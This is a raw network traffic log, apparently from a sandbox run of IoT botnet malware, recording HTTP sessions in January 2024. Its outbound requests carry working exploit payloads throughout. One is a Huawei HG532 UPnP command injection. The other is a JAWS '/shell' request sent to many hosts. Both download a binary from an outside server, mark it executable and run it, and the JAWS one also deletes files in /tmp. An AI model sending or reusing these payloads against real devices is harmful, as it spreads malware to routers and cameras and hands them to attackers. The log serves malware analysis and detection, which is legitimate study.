                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:12.175045967 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:28.044784069 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:01.064141989 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          56192.168.2.233423238.181.35.21980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:57.729739904 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:58.042231083 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:23:57 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          57192.168.2.2357840104.91.11.15180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:57.977771044 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:58.223002911 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:23:58 GMT
                                                          Date: Tue, 02 Jan 2024 05:23:58 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 36 35 37 62 35 63 26 23 34 36 3b 31 37 30 34 31 37 33 30 33 38 26 23 34 36 3b 33 62 64 39 62 38 34 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5657b5c&#46;1704173038&#46;3bd9b841</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          58192.168.2.2343892207.60.214.5380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:58.146251917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:58.314632893 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:23:58 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          59192.168.2.235978423.43.229.22880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:58.287305117 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:58.597147942 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:23:58 GMT
                                                          Date: Tue, 02 Jan 2024 05:23:58 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 66 31 34 32 30 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 33 38 26 23 34 36 3b 31 34 65 65 30 31 37 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;3f142017&#46;1704173038&#46;14ee0172</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          60192.168.2.2359634154.216.168.7680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:58.312911987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:58.648139000 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:23:58 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          61192.168.2.235204649.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:58.443186045 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 33 3a 35 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:23:57Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          62192.168.2.236035054.254.143.7780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:58.484471083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:58.823184013 CET284INHTTP/1.1 400 Bad Request
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:23:58 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 122
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          63192.168.2.235476635.244.163.22180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:58.944015026 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          64192.168.2.233634823.78.13.16080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:58.964776039 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:59.107402086 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:23:59 GMT
                                                          Date: Tue, 02 Jan 2024 05:23:59 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 37 63 34 32 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 33 39 26 23 34 36 3b 31 38 34 64 65 31 36 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;977c4217&#46;1704173039&#46;184de165</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          65192.168.2.234342444.237.111.25380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:59.006300926 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          66192.168.2.235217849.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:59.196369886 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 33 3a 35 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:23:58Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          67192.168.2.234496287.249.21.23180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:59.225841045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          68192.168.2.234847477.75.231.12480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:59.226696968 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:59.510098934 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:23:59 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          69192.168.2.2358160202.88.191.10480
                                                          TimestampBytes transferredDirectionData
